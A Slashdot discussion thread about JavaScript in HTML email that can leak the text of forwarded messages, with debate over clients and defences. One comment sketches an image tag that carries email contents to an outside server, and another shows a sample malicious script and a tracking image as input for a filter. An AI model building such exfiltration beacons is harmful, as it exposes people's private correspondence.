      Probably the best prevention is for the virus scan folks to build in a check for javascript in e-mail. Of course not everyone has a virus scanner on their machine that checks inbound e-mail, but I'll bet on that over getting everyone to turn off javascript in their reader. :)

    5. Re:That's Why..... by NonSequor · · Score: 1
      Yeah, but wouldn't it overflow some buggy version of Sendmail first?


      "Homo sum: humani nil a me alienum puto"
      (I am a man: nothing human is alien to me)

      --
      My only political goal is to see to it that no political party achieves its goals.
    6. Re:That's Why..... by Yoshi+Have+Big+Tail · · Score: 1

      Oh well.

      But you might as well say that as you won't leave your house, you're untouched by street crime.

      While it's true, you're missing out on a lot. Personally I prefer to live life to the full.

    7. Re:That's Why..... by nomadic · · Score: 3

      But you're only safe if everyone else uses Pine, and everything they know uses, etc. Just need one java-enabled mail program in the link and everything's compromised.
      --

    8. Re:That's Why..... by larien · · Score: 2
      Bzzzt! There was a buffer overflow in pine a while back which was potentially exploitable. In short, you could send a message with a sufficiently long Subject: line and overflow an unchecked buffer.

      In true open source style, the bug was fixed pretty quickly and recent versions are, AFAIK, safe.
      --

    9. Re:That's Why..... by iapetus · · Score: 2

      I tend to find PINE preferable to most graphical e-mail clients anyway, of course. It's fast and easy to use, I can access it from anywhere, and it isn't prone to all these nasty e-mail viruses. And if I want to view that ugly 'enhanced' content that only spammers seem to send, a tap of the return key loads it into Lynx. :^)

      --
      ++ Say to Elrond "Hello.".
      Elrond says "No.". Elrond gives you some lunch.
    10. Re:That's Why..... by BSOD+Bitch · · Score: 1

      Thats why I use Mutt with Pico.

      --


      M$ stock dropped in 1/2 since last year. If you are a MCSE, you will be broke.
    11. Re:That's Why..... by Nickoty · · Score: 1

      Somebody always mentions this jokey fact yes.. It shouldn't be forgotten that any other mail client would do just fine, even Outlook & co, provided they are sanely configured. PINE just doesn't offer the lame options.

      --


      -- Cure for Cancer instead of SETI! (only w32 yet - mail and beg)
    12. Re:That's Why..... by Dodger_ · · Score: 1

      What the heck is a person missing out on when they use pine or mutt(my choice)? Badly formatted html with atrocious use of fonts and colors? An email that takes minutes to load because it connects to 20 sites to download pictures and other assorted garbage? I would not call receiving email of this nature, "[living] life to the full".

      --
      Dodger_
    13. Re:That's Why..... by gowen · · Score: 2

      Thats why its imperative that people get back into the habit of *trimming their messages* instead of quoting absolutely everything they recieved.

      --
      Athletic Scholarships to universities make as much sense as academic scholarships to sports teams.
    14. Re:That's Why..... by dattaway · · Score: 2

      There was a buffer overflow in pine a while back which was potentially exploitable.

      I use pine. You have my email address. Now try it.

  36. No free reg by Yoshi+Have+Big+Tail · · Score: 2

    Here is the login-free URL

  37. Re:Minor Nitpick by nomadic · · Score: 1

    Javascript isn't Java, they aren't even related in any way.

    You're right of course, that was a typo. Javascript is pure evil, while Java is only 90% evil.
    --

  38. HTML vs Javascript? by jlusk4 · · Score: 1
    Sorry, I don't quite see how your feelings toward html are relevant to a javascript-based problem.

    Unless you consider javascript to be an integral part of html, which I don't.

    Seems to me all the email problems stem from executable content, not formatting. An email client that honored basic html formatting tags w/out honoring javascript should be just fine.

    Linux folks writing a new email client might be able to start w/Gecko and strip out the javascript support.

    (BTW, I used to feel the same way about plain text email. When I'm at home, I use fetchmail and emacs gnus to sort my mail and score the messages and it is just too cool for school. BUT, I do like being able to indent and bullet and color and italicize and all that, and I wish emacs could do it, somehow.)

    John.

  39. Security by mheckaman · · Score: 2

    That is the unfortunate truth to security; things are only as secure as the weakest link. I would argue that until the current state of email clients, usages, and so forth changes; we should have zero expectation of privacy in email. I would love to think [P]GP[G] will change the world in email privacy, but I suspect that Joe User will just get their key stolen through a javascript hole in their web browser (AKA mail client).

    Matt

    --

    Don't take life so seriously; it isn't permanent.

    1. Re:Security by somethingwicked · · Score: 1
      I suspect that Joe User will just get their key stolen through a javascript hole in their web browser

      Joe User will leave his password and key and everything else you need on a post-it note stuck to his monitor

      --

      ---"What did I say that sounded like 'Tell me about your day?'"---

    2. Re:Security by jovlinger · · Score: 3

      This is why PGP has the option to mark a message as decryptable to screen only. While you are [always] completely hosed if your recipient is malicious, this sort of annotation will make it harder for recipients downstream to compromise you if they are merely lacking in clue.

      The lesson is that active documents are a bad idea, unless they have extremely well thought out security infrastructures. Does anyone have pointers to such infrastructures?

      Let me also ask my standard question that I've been asking since I first heard of web-bugs: how come there isn't a standard for sending out self contained html document clusters -- several linked pages, with all the graphics and files they need to be viewed? You could then use the standard "you are about to view and insecure page" when you click on any external links they might have.

  40. ASCII Ribbon Campaign - Say NO to HTML in email by Pac · · Score: 3

    /"\
    \ /
    X ASCII Ribbon Campaign - Say NO to HTML in email
    / \

    Originally created in Brazil by Tony de Marco
    Better viewed in plain text :)

  41. Re:AOL not affected? by Keel · · Score: 2

    AOL's email client is not OE. It has inferior capabilities. Although many in this discussion apparently think that is a good thing.

    --

    ----

    "Oh, bother," said Pooh, as he hid Piglet's mangled corpse.

  42. Re:Active vs passive content in emails by EllisDees · · Score: 1
    Whilst technically you can convey whatever information you want through the use of plain text (maybe using some *emphasis*) and attachments, for many this is a solution which is less convenient for them - it requires more clicks or keypresses to access, and doesn't present the information in quite such an integrated manner.
    How does it require more clicks to send a simple text message than to send some nasty html-formatted mess? All you have to do is start typing!
    --
    -- Give me ambiguity or give me something else!
  43. Re:Turn Off JavaScript by Anonymous Coward · · Score: 1

    Disableing javascript on your own system won't necessarily help. If you forward a bugged message to someone that has javascript turned on in their email client, you're still hosed.

  44. Re:"I can be careful, I'm still vulnerable." by xjimhb · · Score: 1

    But ... but ... but ... If I didn't have HTML e-mail capabilities, how could I subscribe to critical information ... like the daily "Foxtrot" which our local paper only carries on Sunday???? I mean, some things are IMPORTANT!

    By the way, they mention Netscape Messenger 6 - are the older versions of Netscape (4.7x) immune? They do have the "Javascript on E-mail" switch, so one would assume thet do something with it.

  45. Re:100% Anti-SPAM Method proposed. by FunkyChild · · Score: 1

    Then when I received it, it must match the sender's IP address or I'll rejected.

    What about if the sender is on dialup, or is at a different computer when they send the message?

  46. This is old news... by gillbates · · Score: 1

    This is nothing new to those of us running Windows... HELLO? Wakeup! Insecure systems are the way of the future! While all you folks have been happy in *NIX-land, the world has accepted the fact that vulnerability is the way of the future - in the future all systems will have advanced virus-enabling features, though I must admit, it will be a while before you *NIX freaks catch on to this new trend...

    --
    The society for a thought-free internet welcomes you.
  47. Re:Too bizarre, also almost too unbelievable. by netsharc · · Score: 1

    I don't see how the JavaScript can send a command for the mail program to send the data back to the spy. Of course the JavaScript can read the whole HTML page (or email, same thing) and then display it back to you, but how does it get the message out to the spy? And they just simply removed that tricky bit out and said "Since we are nice, we prepared this particular wiretap so that it does not send email."

    Actually now that I've thought about it, the code can just create an IMG tag and add the contents of the email to the SRC. So like this... <IMG SRC="http://www.somesite.com/PUTCONTENTSOFEMAILHER ELALALALA"> .. afterwards the owner of somesite.com can just check his server logs to snoop on the email. Damn I just answered my own scepticism.. and showed the kiddies how to finish the exploit too. Well let them go to work, I wonder when the FBIs (or their equivalent here in DE) are going to knock on my door.

    --
    What time is it/will be over there? Check with my iPhone app!
  48. Re:you're looking at this the wrong way by magnwa · · Score: 1

    @HOME hasn't had that vulernability for over two years now. THey had it for TWO MONTHS at the beginning of their service, then scrapped the modems that did it and went to a router based modem. But.. if you want to get @HOME, go right ahead.

  49. Text/Enriched by Arker · · Score: 2

    The few features of HTML which are actually useful in email are properly used by selecting the Text/Enriched MIME format, see RFC1896.

    Some mail gateways discard HTML before forwarding messages - more of them should.

    --
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Friends don't let friends enable ecmascript.
    1. Re:Text/Enriched by Tau+Zero · · Score: 1
      And they should all discard Javascript.

      It occurs to me that turning off Javascript execution in your mailer is backwards. You should be able to have your mailer automatically remove Javascript attachments so that they are not forwarded either. This would eliminate the problem of careless people downstream from you; they could not activate the spy-attachment because there would be no attachment to activate.
      --
      Knowledge is power
      Power corrupts
      Study hard

      --
      Time is Nature's way of keeping everything from happening at once... the bitch.
  50. I *hate* HTML email. by bradipo · · Score: 1

    This is just one more reason in my list to continue *hating* HTML in email. I refuse to read email from someone that is composed of HTML---I will continue to do so.

  51. Careful, you may be commiting a Felony [dmca] by Convergence · · Score: 2

    [RE: the no-reg-required link for nytimes]

    Does the DMCA not currently state that by violating an access control measure, or publishing information to violate an access control measure that you are commiting a felony and may be subject to jail time and large fines?

    You might want to be careful about being so helpful in the future. Let this be a lesson to all of us. Do not use such links for in doing them, you may commit a crime.

    -- This batch of insanity brought to you from the letter C and your favorite federal government.

    1. Re:Careful, you may be commiting a Felony [dmca] by WillSeattle · · Score: 2

      They'll take my free speech rights when they pry them from my cold dead clone's body ...

      Information must be Free - Knowledge comes at a price, that of eternal vigilance, plus a quarter for a phone call.

      --
      --- Will in Seattle - What are you doing to fight the War?
  52. Re:Our organization by bogado · · Score: 1

    Why not create a mail filter in the smtp server so that it will strip-out any script from the HTML mail it self. This filter could even strip-out "get" headers from images (yes I know that this isn't enought, but it shures helps).

    So what I am sujesting is that a html mail that looks like this:

    <html>
    <body>
    <script> nasty stuff </script>
    <img onload="do nasty stuff" src="http://nasty.stuff.com/beatiful_image.jpg?ema il=john@doe.com">

    </body>
    </htlm>

    could turn into this :

    <html>
    <body>

    <img src="http://nasty.stuff.com/beatiful_image.jpg"&gt ;

    </body>
    </htlm>

    --
    "take the red pill and you stay in wonderland and I'll show you how deep the rabbit hole goes"

    --
    []'s Victor Bogado da Silva Lins

    ^[:wq

  53. Hackers strike again!!! by MattGWU · · Score: 1

    Washington DC News Channel 8 did a quick little spot for this just now on their evening news, leading the story with one of their computer icons with the words "Computer Hackers!" underneath it. Although "Hackers" weren't mentioned in the rest of the spot, the story did a predictable ammount to "put the fear" into the consumer, and further blacken the name of true hackers everywhere.

    They suggested disabling javascript in email (many times [redundantly] refuted here), as well as announced a patch from Microsoft. Doing the usual through job, they neglected to mention the forwarding vulerability of this; something the Java disabiling won't help

    And here I thought it was just a bug...good old media setting the record straight!


    Heeeyyy...wait a minute.....

    --
    "These people look deep within my soul and assign me a number based on the order in which I joined" --Homer re:
  54. This much has always been true... by somethingwicked · · Score: 2
    If my neighbor isn't diligent and I send him an e-mail, I'm still vulnerable.

    This much has always been true in ANY private communication. The point of failure will always be what steps the recipient takes/doesn't take to protect that information. In order to communicate with another humna being, this risk is inherent.

    Singing "Paranoia may destroy yaaa..."

    --

    ---"What did I say that sounded like 'Tell me about your day?'"---

  55. Solution by Captain_Frisk · · Score: 1

    I can be careful, I can take every precaution, I can turn off JavaScript, and it doesn't matter. If my neighbor isn't diligent and I send him an e-mail, I'm still vulnerable

    For the extra paranoid, the solution here is not to forward the mail, but rather just copy and paste the text of the message into another message. This way the JavaScript doesn't get sent along with it.

    If you were feeling especially feisty, I bet you could write some manner of filter that automatically strips the tags out of an email, preventing the scripts to operate on your machine, and preventing them from operating on other systems if you forward the message.

    Besides, why would anyone here be forwarding email from someone who would do this?

    Captain_Frisk

  56. Dancing Babies and other Trojan Horses... by SnapShot · · Score: 2

    You don't need some technological trick to harvest emails. Just up a web page with an inane joke, animated gif, etc. and include a button that says, "Email to a Friend!". Voila! You've just harvested the email addresses of everyone who received an email from anyone who though the web page was even faintly amusing.

    The only defence, until people start treating other peoples emails with more respect, is to keep two accounts. I personally only give out my work address, except to close and technically aware friends, at least then I get paid to read spam...

    --
    Waltz, nymph, for quick jigs vex Bud.
  57. I've tried this also... by Nerftoe · · Score: 1

    it's compltely impossible to delete Outlook Express...

    I've tried this also when I switched to Eudora.

    Have you ever looked at your swap file and wondered what the heck was in it? Outlook Express AND Internet Explorer are always cached inside your swap file! Upon bootup, your Windows system looks to see if any essential programs are missing, and replaces them. :-)

    Seriously though, those files have to come from somewhere.

  58. Active Content Has Its Uses by amnesty · · Score: 2

    I think that HTML has its place in the email world, whether we like it or not. At work our help desk has to respond to emails from other internal departments where they are having trouble with something. And anyone who's tried to help out a friend who doesn't know too much about computers should realize that its incredibly hard to use the phone or even a text email to convey how to do things.

    Even the syntax Start -> Settings -> Control Panel -> Display Properties confuses most of them. So the solution that works is to put screenshots to illustrate how to do it. There really isn't any more elegant way short of physically finding the caller and working at his/her desk.

    So agreed, we open up the security can of worms when we allow HTML. Perhaps there are solutions... non-HTML ways? Or only allowing internal email html to access resources (images) on the internal network? But many workplaces have important uses for the extra features with HTML, so instead of choosing the easy way out, (abolish HTML) perhaps we can find a better solution, if only out of necessity.


    1. Re:Active Content Has Its Uses by Stonehand · · Score: 1

      You could put up a separate web page, and put the URL (in plain text) in the message, if for some reason they NEED the HTML version. Surely a bit of cut-and-paste won't kill 'em. Then ask them to mail you back when they don't need the page anymore, unless you're planning to keep it online in case it's an FAQ.

      Or, since your org probably has a printer, keep some .ps / .pdf files around and direct the users to them. They can easily obtain a nicely formatted copy, which could be put in a binder, tray of fliers, or what not...

      --
      Only the dead have seen the end of war.
    2. Re:Active Content Has Its Uses by Alien54 · · Score: 2
      I think that HTML has its place in the email world, whether we like it or not. At work our help desk has to respond to emails from other internal departments where they are having trouble with something. And anyone who's tried to help out a friend who doesn't know too much about computers should realize that its incredibly hard to use the phone or even a text email to convey how to do things.

      The uses I can think of are SPAM - and teenage entertainment.

      As far as advertising goes, it would be better so send a person to the legitimate company webpage. Then we can contact the service provider, and get their account cancelled.

      As far as teenage entertainment, I suppose there is no accounting for tastes, and I can tolerate occasional emails with fluttering hearts and excessive cuteness from my little sister. (it's family after all)

      In a business context, there is a need to get sales types more clued in. I have heard more war stories of sales types getting sent full fize presentation files as attachments in email while on the road on a flaky dial-up, never mind the clients that receive a flash website in their email. There has to be a better solution for that kind of stuff.

      --
      "It is a greater offense to steal men's labor, than their clothes"
  59. Re:How about "Plain Text" mode in Eudora (and equi by achurch · · Score: 1
    How does one do this? I'm using Eudora 4.01 (Japanese version) and I can't find any option anywhere to disable HTML in incoming messages. I even hacked the binary to change all occurrences of "HTML" to "XTML", and all that gave me is an outbox full of messages containing ... (even though I told it to send in plain text!). Is it just not possible in this version?

    --
    BACKNEXTFINISHCANCEL

  60. Stop posting news from NYT by MrJones · · Score: 1

    Why is the need to register?
    I can read cnn.com and bbc.co.uk for free.
    Not to mention all news sites in Internet!

    --
    Get my e-mail after a captcha test in: http://tinymailt
  61. Eh? by Arker · · Score: 1

    But you're only safe if everyone else uses Pine, and everything they know uses, etc. Just need one java-enabled mail program in the link and everything's compromised.

    Hrmm... no. He'd have to deliberately forward garbage for this to work, how many Pine (or Mutt, or Pmail, or...) users deliberately forward garbage? I certainly don't. That's a big part of why people choose these clients - to filter out the garbage.

    --
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Friends don't let friends enable ecmascript.
  62. Educate your users! by ghibli · · Score: 2
    In our company, we get our users involved in the decision-making process instead of making and trying to enforce blanket security policies without explanation. We regularly educate our users about various e-mail formats and attachment types, their benefits and dangers, as well as other network security issues. By focusing on education instead of enforcing rules, my team has been able to get high levels of user co-operation and posivite feedback.

    As you acknowledge, "a great deal of the HTML features are utterly useless in a E-mail." So why not educate others of this fact, instead of chopping it down to a black-and-white issue of all HTML or none at all.

    Most users are not stupid, merely ignorant of some details. There is a difference, and much of this ignorance is due to techies that can't clearly express themselves.

  63. Turn off network access! by jriskin · · Score: 1

    Quick Disclaimer:

    1. I agree that HTML that accesses the network is bad.
    2. Javascript is also a big DUH!
    3. I'm not a big MS advocate...

    But, I'm surprised more email clients don't have the ability to turn off network access. In MS Entourage for MacOS, you can click a preference under Mail & News Preferences that reads, "Allow network access when displaying complex HTML". If you uncheck this, your email client wont display anything that isn't contained within the email message itself and it won't try to access the network.

    Solving the problem...

  64. I think you're confusing HTML w/its common usage by jlusk4 · · Score: 1
    I think html, properly restricted in email, used primarily (only?) for text formatting, could be great. "Proper restriction" for me would include: no damn images, no javascript, no references to resources not immediately included in the html and whatever else smarter people than I think of.

    The stuff you're complaining about has more to do with how html email is commonly (mis-)used than any intrinsic badness in html.

    Wasted bandwidth, storage, slow loadtimes: all due to images.

    Cruddy appearance in text interfaces: well, yeah, but I bet a minimal html editor that tried to preserve text format (or format the marked-up text to reflect how the markup will make it appear) could be written. (I'm thinking potential Linux html-based email clients.)

    Interference of ads: images again.

    Tracking user's habits: side-effect of handing off the html to a full-blown web browser for rendering. I don't think we need that.

    Cross-platform compatibility: side effect of current crop of crappy html generators. If our hypothetical email client used nothing but xhtml/html 4.01, we'd be ok, yes?

    Necessity of being connected: only if the html requests external resources. Images again. Why should we tolerate that? But... it's not an intrinsically bad thing about html, just how it's used.

    Mail lists: well, yeah, but if minimal html clients became the norm, maybe that problem would be reduced. In the meantime, hey, save as text!

    John.

  65. Re:"I can be careful, I'm still vulnerable." by johnnie · · Score: 1

    http://www2.uclick.com/client/wpc/ft/
    or, look at most any major newspaper's website.

    they make you accept a cookie, but so does Taco :)

    anyhoo, i think i can deal with one stupid little cookie to read my strips for free...

    at least it's not 'free registration' ...

    --
    Don't ask. Go see.
  66. Re:Java isn't Javascript by Madwand · · Score: 1

    Java and JavaScript both suck when used with the web. Here is an explanation why.

  67. Enriched Text for emails (=!= Rich Text Format)!!! by CJF · · Score: 1

    From one RFC supporting HTML-email basher to another:

    you have made the common mistake of confusing Microsoft's proprietary and every-changing `Rich Text Format' (RTF) for documents with the open standard for formatting emails which is actually called `` Enriched Text.'' (That was supposed to be a demonstration of the Enriched Text tags)

    If only Microsoft, Netscape et al supported the Enriched Text RFC instead of the stupid so-called `HTML email', then (almost) every one would be happy. And if only advocates of open standards could get their facts right...

  68. Re:Minor Nitpick by Tackhead · · Score: 2
    > And why we continue to use this mistaken nomenclature is beyond me. The associations are common but the technologies are only superficially related. Javascript has a heinous, disorganized API, is weakly typed, etc. ECMAScript is a standardization of the base Javascript API and syntax.

    Absolutely correct. But the point is that they both blow goats when implemented in email clients. As Beavis and Butthead point out - "You can't polish a turd."

    Actually, they both blow goats in web sites too, but that's not relevant to the bit about turd-polishing or lusers who don't know the difference between a web browser and an email client ;)

  69. RFC1896 by Arker · · Score: 2

    A few weeks back we had a discussion here about a new email client for Linux that was 'compatible' with LookOut, including support for HTML email. I posted a small rant on why that's not a feature, but a bug, and a few called me a ludite.

    I agree with you this is a bug not a feature, however, if you were not prepared to offer a non-buggy way to make the users who expect this happy, that might legitimately have earned you such an epithet.

    Face it, the typical e-mail user these days does expect some formatting capabilities. There is a way to do this without diving into html-hell. See this. The Text/Enriched MIME format was designed to provide formatting capabilities that many users desire without the never-ending problems entailed by using HTML out of place. The makers of Pegasus Mail have taken a very usable approach to satisfy users desires with the minimal messiness on the other end - HTML messages incoming can be parsed internally with a minimal module that only understand the most commonly used and innocous tags, handed off to an external browser for parsing, or simply stripped to text. Formatted messages are normally sent using Text/Enriched, RTF is also available as an option (very useful if you know the recipient to be on a windows box.) So the pmail users can receive these annoying things and read them fine, but when they forward/reply they don't perpetuate the madness.

    --
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Friends don't let friends enable ecmascript.
  70. Re:Failure of non-HTML text formatting... by mpe · · Score: 2

    It would be a great idea of someone would write up a subset of HTML as an RFC that could be used simply for text formatting (STRONG, BLOCKQUOTE, etc. - maybe even TABLE) for email use (and I would image there are many other uses, as well).

    A Primary design criteria is that the results should be human readable. e.g. formatting with hard returns and short tags...

  71. Possible solution by JCCyC · · Score: 2
    Sneakemail. Although you'll have to obliterate every email address you currently use, establish a new one and never ever EVER give it to anyone. You only give away aliases created by Sneakemail. The moment one of them is used to send you spam, you delete it.

    I'm seriously plan to start using it Real Soon Now(TM), but getting rid of the current ones (and redoing all the subscriptions etc etc) will be a PITA. Yeah, I'm lazy. Sue me.

  72. Re:It's going to get worse by yoz · · Score: 2

    Can you supply any more details?

  73. Re:I hate to say this but ...... by MightyMicro · · Score: 1

    Equally, there's also a 'u' in neighbour over here ;-)

  74. The simple solution is... by digidave · · Score: 1

    Never forward messages. The 'evil' JavaScript isn't going to be in an email from your boss asking you to send him some report, is it? Quit forwarding those damn jokes and chain mails and get your lazy ass back to work. As someone who never forwards anything unsolicited to anybody, I don't see how this affects me and, quite honestly, I'm a little shocked that so much of the /. crowd does forward stuff. Aren't you guys just poliferating this shit?

    It just occured to me that I can probably remove the 'Forward' button in Outlook (I love MS's cool modifiable toolbars). I'm going to go take that sucker out right now :P

    --
    The global economy is a great thing until you feel it locally.
  75. Re:Wrong! RTFA! by Jerf · · Score: 2
    Last month, I received an email out of the blue from Carl Voth, of British Columbia. Expanding on my research, Carl had discovered an interesting "feature" in certain popular brands of email readers. Using a little bit of JavaScript code embedded in an email message, he found that not only could the sender of a message be notified when an email is opened, but the sender could capture the text of messages when the email is forwarded.

    Who labelled the parent of this message insightful? RTFA!

  76. Easy fix... by thechink · · Score: 2

    I use Outlook Express (flame me later), I have disabled all scripting AND only reply or forward in plain text (OE can be setup to do this by default). This way there is no forwarding of any scripts. I'm sure Outlook can be configured the same.

    1. Re:Easy fix... by mrfiddlehead · · Score: 1
      Perhaps easy, but your average moron who uses a comfutre is not going to know this, or even care for that matter. Most of my L^Husers don't give a fig about network security because they all say, I don't have anything to hide on the server. If they could they'd all use their middle name as their password.

      As per usual, Micro$oft is culpable for the insecurity of their products. As per usual, they will not be chastised by anyone in the industry except for a bunch of snot nosed gits like us.

      --
      :wq
    2. Re:Easy fix... by Nickoty · · Score: 1

      Yeah, problem with MS product is just that you typically need to invert essentially all configuration options before you can start using the program. They obviously come pre-configured for those who don't know how to change configuration.

      --


      -- Cure for Cancer instead of SETI! (only w32 yet - mail and beg)
  77. WONT WORK: Re:UNcheck "Enable Javascript for Mail by Seinfeld · · Score: 1

    That will only work for e-mail YOU send. The JavaScript code will still be in the message, and when Joe Recipient gets the message, he won't have JavaScript turned off, so his reply/forward will be sent to the person who bugged the e-mail -- and if your message is quoted in the reply/forward, yours is sent too. So unless you can guarantee that every recipient of the message has JavaScript turned off, and everyone they send it too has it turned off, and so on, your privacy is at risk. It's like the reverse of a spread of a disease. Anyone downstream can affect the upstream people.
    -----------

    --
    -----------
    If you ever drop your keys into a river of molten lava, forget 'em, because man, they're gone. -- Jack
  78. Re:Reversed Use by Steeltoe · · Score: 1

    "... Instead of freaking out over every exploit that pops up and scrambling to get patches, I wonder why people don't use it as an opportunity to their own benefit for the greater good."

    It's because it won't solve any problem. The spammers will switch to a more RFC-compliant email reader or turn off JS.

    On another note, aggressive action has never fixed any problems in this world. You can shoot and imprison people, but it won't fix the root problem.

    - Steeltoe

  79. Old News by vattervi · · Score: 2

    Although I am too lazy to go find the article, I remember Slashdot reporting on this several months ago. If I remember correctly, ssn1 (formerly HackerNewsNetwork) first publicized the story. And excellent FAQ on Web Bugs is available at:

    http://www.privacyfoundation.org/education/webbug. html

  80. �If you _have_ to forward jokes... by yerricde · · Score: 1

    Quit forwarding those damn jokes and chain mails and get your lazy ass back to work.

    If you feel you need to forward that joke, feel free to write it up on Everything and forward the URL. Takes up a lot less bandwidth that way, and sending it as plain text excludes the possibility of malicious EcmaScripts.


    Like Tetris? Like drugs? Ever try combining them?
    --
    Will I retire or break 10K?
  81. Re:Our organization by ethereal · · Score: 1

    What's a malay? I mean, other than a resident of Malaysia? Were you both aiming for "malaise", or what? Not that "malaise" would make any sense either...

    --

    Your right to not believe: Americans United for Separation of Church and

  82. Re:Just don't use HTML Mail! by MadAhab · · Score: 1
    I can't think of one important benefit. I use text-only email, and it's never been a problem or an obstacle. Even your granny can understand and use emoticons in 5 minutes or less, and she'd probably love it if you showed that to her instead of putting img tags in html mail and trying to explain why that's better than sending the picture.

    Even Hatelook (tho not Shitmail) knows to include plain text version and put the HTML mail as an attachment. And since I don't include attachments by default in a reply, I won't be forwarding this bug at all (unless I get it from a Hotmail account, which now has HTML only by default, in which case it DOES get forwarded... to /dev/null.

    Boss of nothin. Big deal.
    Son, go get daddy's hard plastic eyes.

    --
    Expanding a vast wasteland since 1996.
  83. Re:Just don't use HTML Mail! by mrfiddlehead · · Score: 1

    Two fucking words: bull shit.

    --
    :wq
  84. 100% Anti-SPAM Method proposed. by Dark+Coder · · Score: 1

    That's Easy,

    Given the example friend's email address is john@doe.com and your email is "mine@yob.com"

    I modified my sendmail to automatically update the "From:" into "mine+john.doe.com@yob.com". Of course, its different for each target email.

    Then when I received it, it must match the sender's IP address or I'll rejected.

    To ensure protection against falsification, my address book is consulted for additional verification.

    This enforces point-to-point and reverts back to the original intent by email philosophy and hopefully eliminate SPAM forever!

    Cool, UH?

  85. Not Really an issue? by snakecoder · · Score: 1

    Think about it. If I were to write a corpate e-mail and try to spy, using this method, there is a decent chance that I would get caught. Would it be worth risking my job? On the other hand, spammers would love to use this method, but who forwards spam? Personally, if I caught somebody setting up a URL to capture javascript spying, I would fire a script that hit that URL a hundred times a minute. I would have the script grab random stuff off the web for content :-)

    --
    -Nuke the moon
  86. Delete the Javascript in your reply by scruffy · · Score: 2
    I can be careful, I can take every precaution, I can turn off JavaScript, and it doesn't matter. If my neighbor isn't diligent and I send him an e-mail, I'm still vulnerable.
    I don't quite understand this comment. Can't you protect yourself by just deleting the Javascript in your reply? Is this nontrivial to do in these HTML mail programs?

    Your neighbor could, of course, copy your message into another message with the Javascript.

    1. Re:Delete the Javascript in your reply by miserere · · Score: 1
      Can't you protect yourself by just deleting the Javascript in your reply?

      I was wondering this as well. I use Outlook. I can't find any way to view the HTML source of an email message. So how can I tell if a message someone sends me has the JavaScript code in question? And even if I can see that it's there, how can I edit it out?

      I tend to change the format of all my replies and forwards to plain text. But sometimes it is helpful to use different fonts and colors if a message has replies by many different people - it's easier to see who said what that way.

    2. Re:Delete the Javascript in your reply by roca · · Score: 2

      I think you're right. The mail client should be configurable not just to ignore Javascript in HTML email, but actually strip it out completely before forwarding/replying/etc.

      Someone should hack this into Mozilla right away.

  87. Trust Your Neigbor? by operagost · · Score: 2

    Trust your spellchecker?

    --

    Gamingmuseum.com: Give your 3D accelerator a rest.
  88. dip in NY Times tech reporting? by barryi · · Score: 1
    I'm used to a more informed persective from the Times. The reporter (Harmon) was writing from a newbie-ish "everyone reads email using a web browser or Outlook in Windows" sort of perspective. "Right-click on the message body" and instructions about the resulting "view source" menu option is even suggested with no mention of software or OS, at best confusing poor Macintosh users. Weird. No mention of the real story, how new risks are created by ill-considered fancy features. No mention of how many in the know deal with this (I've never had Mutt run Javascript yet...)

    I've seen omissions / lacks of understanding of this scale and greater in the past few months in Times articles. Why is the newspaper of record getting worse in its technology reporting?

  89. Re:Minor Nitpick by NonSequor · · Score: 1
    As I remember, Javascript was originally to be called LiveScript or some such nonsense.


    "Homo sum: humani nil a me alienum puto"
    (I am a man: nothing human is alien to me)

    --
    My only political goal is to see to it that no political party achieves its goals.
  90. Minor Nitpick by Carnage4Life · · Score: 4

    But you're only safe if everyone else uses Pine, and everything they know uses, etc. Just need one java-enabled mail program in the link and everything's compromised

    Javascript isn't Java, they aren't even related in any way. Java is the architecture-neutral, object-oriented, portable, distributed, robust and secure programming language created by Sun Microsystems that can be used to create applets or standalone applications. Javascript is a scripting language originally designed for embedding in browsers which was created by Netscape in a braindead attempt to win the browser wars which instead fragmented the HTML and brought major insecurity to the web.

    Finally I doubt that any email clients are actually Java enabled (i.e. can launch applets, etc).

    Grabel's Law

    1. Re:Minor Nitpick by Fnkmaster · · Score: 2
      And why we continue to use this mistaken nomenclature is beyond me. The associations are common but the technologies are only superficially related. Javascript has a heinous, disorganized API, is weakly typed, etc. ECMAScript is a standardization of the base Javascript API and syntax. Javascript embedded in the browser lets you access the in-browser document via some level of DOM-alike API (although these are totally nonstandardized, as we all know - this is generally known by the also-misused nomenclature DHTML, which just means using CSS and layer-type things with Javascript as the active event control structure.

      Java may be used in the applet framework, and that may have been part of the early vision of Java but that's now just a sideline to server-side Java, where the ability to build large scale apps without the syntactic complexity of C++ lets you push out business logic with fewer worries about internals.

      In general though, the languages are often perceived as a combination of syntax, general usage characteristics, and standardized/available APIs. Java is incredibly different from JavaScript in all of these ways, and the association with "the web" is an artifact of one particular use of Java.

    2. Re:Minor Nitpick by Anonymous Coward · · Score: 1

      The creator of javascript, and he's proud of his job!

    3. Re:Minor Nitpick by Fnkmaster · · Score: 2
      You misread my comment. I realize that the W3C DOM spec is a standard API. However the only browser as you point out that comes very close to supporting this API is Netscape6/Mozilla/other Gecko based browsers which represent in total no more than a few percent of the browser market right now. I was commenting on the Netscape 4.x and IE 4.x/5.x document.layers and document.all Javascript objects which allow, in very nonstandard ways, access to most of the DOM functionality. Those are the pseudo-DOM/DOM-alike APIs I was referring to.

      The point is that a standard that you can't assume support for is a fairly ineffective standard - within a year of so, I think the standard will be pretty much accepted, or at least I hope so. Better to make people download an up-to-date, standards-compliant browser than to have to code 4 different versions of your site.

      Of course, the problem is that e-commerce sites can't afford to take that kind of approach. But non-profit sites, general interest sites, etc. can. If they stick to standards compliance, they will drive most people to use standards compliant browsers. And once the market-share of DOM compliant browsers approaches 80% or so, people will stop coding shit for those old nasty browsers.

    4. Re:Minor Nitpick by joto · · Score: 2
      Javascript isn't Java, they aren't even related in any way. Yes, they are. Both contains the word Java in their name (with the possible exception of ECMAScript). Both are associated with the web. Both can be run on the client side. Their syntax looks somewhat superficially similar.

      But of course, these are about the only similarites involved. Not too surprising, that is enough to confuse most people.

      I hate netscape engineers (or was it marketers) for coming up with the name javascript, if they had called it anything else, most people wouldn't have this problem.

    5. Re:Minor Nitpick by drinkypoo · · Score: 1
      I hate netscape engineers (or was it marketers) for coming up with the name javascript, if they had called it anything else, most people wouldn't have this problem.

      The amusing thing is that M$ calls it "JScript", probably in response to the suit filed by Sun over the whole Java thing; They didn't want to get caught calling anything Java- anything.

      JScript is a less lame name than JavaScript, even if it's derived from it. How ironic that M$ should be the one to lead the way :)


      --

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
